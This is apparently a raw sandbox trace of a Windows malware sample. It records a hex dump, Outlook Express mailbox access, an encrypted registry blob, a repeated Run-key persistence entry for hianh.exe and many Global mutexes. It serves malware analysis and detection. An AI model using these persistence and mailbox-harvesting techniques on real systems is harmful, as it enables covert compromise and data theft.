A6 BC 39 5B 6B 9E 60 01 37 FD BB E1 B7 CD BA 36 DA 05 D8 04 F7 34 4B C1 6C E5 C9 A0 6A 86 A6 66 43 FF 75 08 08 03 CF 10 A5 83 1E F9 B1 93 8F C8 9A CC 65 07 51 B8 4D 5E C4 DE 84 B7 A2 69 13 DF 39 23 C6 18 32 B7 8D D5 89 0B 82 08 22 9E 10 14 8D 51 B5 84 61 DC C9 55 16 15 54 99 45 CA 64 02 86 50 23 8A ED 36 7F F6 25 72 17 A4 A8 F1 2B 7E AD 2E DE 6C 17 1E 77 40 13 57 48 92 3B B5 4E A6 EA AA 60 DB 6C 9B B4 58 53 62 46 2A 8F 20 C5 D7 A9 0D 5F 70 64 BE 45 89 3D ED 7C 4A 19 5A BD F7 0A 70 50 B1 3A 6D C8 98 51 54 45 3F D0 72 E5 67 5C ED A7 51 B8 6D 39 06 E5 05 0F A5 65 D7 30 49 A2 13 6E A3 E3 F9 83 5B 90 71 26 AF F8 CA 66 27 DA 9D 5F AC A6 AE CF 1B C5 B9 41 C9 95 79 9D 1D 55 FC 27 3D 6E 66 46 72 60 3B 28 D9 F1 DA ED EF 97 FB E1 BA FD 11 51 D1 EC 8E 1C 29 C7 12 1A 16 0B 39 8B 5B 3E FB 9E 8F 43 C0 0B F4 1A A8 A1 43 11 DA D4 53 AC FA CA 0B 6E 00 B5 F7 57 E1 6C 5B 4C EA 1B 3D CF E6 1B 54 DF 55 3F AA EA 44 6D 02 64 20 CD 78 F4 B6 C5 FF 82 8A B4 68 D5 2C 2A C4 94 6E 0C 8B B6 51 64 15 A6 9E D4 BB 2B 78 54 E1 51 78 94 0F AB 18 83 37 E8 62 12 74 8D E3 C2 61 46 D2 D9 6D 92 86 31 4C 34 D7 97 07 64 3B 9A BB 07 FE 7A C6 2F 29 AC 22 13 FC 0F 25 46 6D 2D 9B 4B 48 B8 DB 99 F7 6F 6D F8 2F B4 DF BD 38 A5 F6 84 A7 6B 17 77 22 F6 41 B9 8C CF F6 8B 2C F0 8E A6 98 4B 9C 67 31 1C 0E 36 A4 12 04 63 3D A6 B7 8E 33 8F E3 A1 90 8C 5D ED 70 E8 96 08 A5 CE 1D 08 FC 6C D7 F2 03 17 8F 05 F9 D6 83 C7 BE 8F 72 30 A0 C7 A0 AB 17 84 D8 03 D1 14 20 AB F4 09 06 5D FF 64 9F CE CA EC 5F 39 60 84 15 A7 70 D8 CF 82 A0 A6 DD 13 0E 9A F0 F9 D4 AB E0 F5 F6 F7 60 26 70 36 06 18 23 D4 96 06 D2 58 AD 97 C7 48 28 27 91 B7 81 8A 2E 5B 7E 04 74 9A 4E 73 AB 1E 16 36 6A 9B F0 74 BA A1 62 C7 37 9E B8 0D 13 50 17 09 53 29 8A E1 26 CE 2C 23 C6 BF A0 01 42 C0 67 84 81 94 74 F5 C4 66 A3 1E EC 3A B0 B1 C8 17 BF E5 DC EB 60 CC F1 94 90 6D 80 2E 9A 78 36 01 AE 4A CD 3D F8 D6 34 27 DC 06 12 18 A0 F3 0C 3B 1E 73 EC 54 5E A9 06 D5 F0 8A 2A B1 13 CF 8D 0C B4 FC 71 8D 8F 67 44 97 56 0D C8 2E FD 5F 69 51 B4 42 D7 75 4F 54 F0 F7 A1 6D F6 
0B 9A 76 57 16 47 6F 12 CB A7 BB DA 36 C3 62 45 01 3B 89 AD A5 DA 87 56 CB 68 38 1E 06 C3 AC 2A 90 38 26 2D 0E 84 04 08 A4 E1 D9 9E 8C 78 E4 DB EA A4 6F BF F8 4F 10 93 1F DC F8 84 7F 5A CB 62 B6 4E 3A 16 E0 CE 4D 19 91 05 2B D6 54 F4 CF 4F 3B C8 B0 E0 AE EA B1 1F 3A 89 40 52 AF 07 D6 70 AF 0E 51 55 5F 1F D2 C0 B9 F9 ED 83 11 77 EB E8 5E 3A C6 F0 12 67 24 E5 2E C7 56 87 A9 44 8E 5A 92 F2 FD B1 49 F8 DD 1D 7C 3D E1 5C B2 B0 31 28 21 1B 8D F1 F6 FD 1E 8D B2 35 50 7C D3 A1 5C 8B 81 7B 52 FF 3B 9A 00 A2 FA 4D 82 B7 6C 4A 16 65 64 BF C8 62 08 C9 4B 09 3F 5C 7D DB 65 1F 9A 29 45 57 DB DD 50 01 40 37 EB 60 B9 5A 2E CA 0F F6 B8 E3 95 EF 95 F1 EC 61 3D F2 71 8A 75 F1 67 B9 EB 20 52 E3 83 56 E8 94 E2 55 F2 2C 57 7B 31 06 89 B2 25 9B B5 38 3E B9 A7 8B 95 CD 19 1F 7E B5 6D 07 0E 5D 43 88 8A 81 FD 90 27 08 5E F2 11 39 20 9D 34 48 6B F9 8F F3 A0 7D 13 76 5F 15 C8 59 7B 9E AD 05 0B EB 3C 16 60 F5 C4 BA 26 00 1A 13 E4 11 94 2C 79 2A 7C 61 E6 16 AD FA 8B 86 1E 0A 44 89 1A BD 37 45 0B AB 43 3C 6F D5 87 D5 FF A5 EF 97 6F 96 89 4F 15 40 4B BC 92 E5 31 44 23 48 7C AF F5 EC 6B 42 37 85 4D B6 A8 A7 54 9F 03 3A 9A BE 97 DD 36 91 16 5A A3 40 A9 C7 F0 75 7A 68 FE CD 5D D5 8F F7 43 C5 88 87 9A E5 BA DD B3 4E 42 35 96 79 E7 66 82 58 E9 5D 0C 37 D1 DE 1C C2 29 F9 B4 C3 D7 F4 82 D5 8D 17 CC FA 7B CC 71 7D 04 F5 56 75 92 68 A1 B0 F3 7C FD E4 B9 E9 DD B0 88 78 E9 87 A2 1A 7E 50 A2 08 1F 97 F7 05 68 AE 5F 71 45 69 3D F8 BB 10 DF D5 F2 65 F8 1D 8A FA 75 6B 72 41 E2 CD 28 06 EE A7 84 FF 8C 0B F7 46 A9 8F D0 E1 9F B2 BB C5 1C 1A FF D4 FC 9D 8D 8D DE EC C1 C0 E6 CA 29 3F 2B 87 BA 75 C6 92 9B 78 DD 88 F0 3F EA CC 79 A8 30 55 CF 97 42 1A FE 97 FB 22 92 0E 09 A3 36 1F 08 2F 2C 28 D9 30 9B 13 1B A2 A2 78 F6 AC E4 75 A0 6F FE 89 A4 08 5B F7 BF 1A 99 17 86 77 74 14 28 DC 28 FD 16 BE DF E7 F8 E3 09 96 1A 7A B6 64 C8 56 9A E9 16 D4 F5 A6 84 EF F3 FE 97 36 CA 90 CA A4 44 37 06 43 A5 D2 23 CE 6A FE CE 78 2A CB 3B D3 2E 67 36 9F B0 89 61 28 DF F8 76 06 2C D8 A6 E7 58 C0 C7 68 01 A8 46 AA 1B 1A 42 DF B9 2E 22 36 
2C 42 57 B1 3E 69 12 E5 6E 04 01 14 80 9B E7 BC 15 C9 EB 31 DB B7 25 C0 DB 8D 59 12 91 D3 B3 46 A8 D6 D7 65 63 10 51 4A D8 BD 96 08 24 36 E0 F2 64 6B DA 5B D1 59 38 BB B1 54 66 4C AC 24 0C F7 EF C9 8F EA 65 25 58 79 64 6B 90 EE 0A 1B 2D A1 30 7A 2D 41 23 72 F6 E7 27 99 9E 12 1E 07 1E 4E E8 0B 64 34 5E D6 AE 78 BB DF 06 C6 79 D4 3C 7E FA 17 C8 AA 09 F9 DF E3 06 A3 F4 B9 82 72 98 31 5C C6 E4 D1 C4 DD 14 B9 A2 F8 B3 9E D7 F1 43 success or wait 1994762873
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci buffer overflow 1994764678
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3120000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1994765672
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3120000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1994766656
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci buffer overflow 1994767570
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci success or wait 1994767932
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3120000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1994774996
Section loaded Path: \KnownDlls\PSAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 3120000 Size: 4096 Protection: readonly Mapped to pid: own pid object name not found 1994788880
Section loaded Path: C:\WINDOWS\system32\psapi.dll Access: query and write and read and execute Type: image Baseaddress: 76BF0000 Size: 45056 Protection: read write Mapped to pid: own pid success or wait 1994790043
Section loaded Path: \NLS\NlsSectionCP28591 Access: read Type: unknown Baseaddress: 76BF0000 Size: 45056 Protection: read write Mapped to pid: own pid object name not found 1994942394
System info queried Type: CurrentTimeZoneInformation success or wait 1994945006
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 76BF0000 Size: 45056 Protection: read write Mapped to pid: own pid object name not found 1994954529
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 3160000 Size: 143360 Protection: read write Mapped to pid: own pid success or wait 1994954717
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbshare Access: query and write and read and execute and extend size Type: unknown Baseaddress: 3160000 Size: 143360 Protection: read write Mapped to pid: own pid object name not found 1994958200
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbshare Access: query and write and read Type: commit Baseaddress: 3010000 Size: 28672 Protection: read write Mapped to pid: own pid success or wait 1994958362
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 3010000 Size: 28672 Protection: read write Mapped to pid: own pid object name not found 1994958859
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 3020000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1994959018
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1995317676
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbshare Access: query and write and read and execute and extend size Type: unknown Baseaddress: 3020000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1995446729
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbshare Access: query and write and read Type: commit Baseaddress: 3040000 Size: 28672 Protection: read write Mapped to pid: own pid success or wait 1995446898
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 3040000 Size: 28672 Protection: read write Mapped to pid: own pid object name not found 1995447388
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 30D0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1995447555
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 30D0000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1995451036
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 3120000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 1995451215
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\MPS56.tmp Access: query and write and read and execute and extend size Type: commit Baseaddress: 2EF0000 Size: 180224 Protection: readonly Mapped to pid: own pid success or wait 1995580440
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1997202606
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid Type: Binary Data: 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1997252386
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1998978432
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1999683387
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2001429679
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2002144313
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2002869721
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2003738153
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2004454005
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2005191672
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2005904722
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2006625665
System info queried Type: ProcessInformation success or wait 2006627402
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2850000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2006636894
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2006639074
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2006640066
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2006640980
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2006641942
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2006642950
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2006643853
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2006644792
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2006645735
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2006646648
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2006647587
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2006648494
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2006649406
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} object name exists 2006650796
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2006651624
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2006652537
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2006653478
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} object name exists 2006654383
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2006655210
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2006656144
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2006657052
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2006658030
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2006658963
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2007361087
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2008071514
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2008800135
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2009526616
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2010252569
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2010979912
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2011706984
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2012444636
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2013161229
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2013888338
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2014615952
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2015345366
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2016069403
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2016796712
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2017524007
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2018250916
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2018980766
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2019706094
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2020432285
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2021159128
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2021886076
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2022613319
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2023343357
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2024067719
System info queried Type: ProcessInformation success or wait 2024523244
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2850000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2024532162
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2024534327
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2024535265
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2024536168
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2024537030
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2024537907
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2024538789
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2024539712
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2024540740
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2024541672
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2024542555
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2024543454
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2024544356
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} object name exists 2024545739
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2024546567
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2024547481
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2024548421
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} object name exists 2024549325
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2024550152
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2024551084
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2024551992
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2024552967
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2024553901
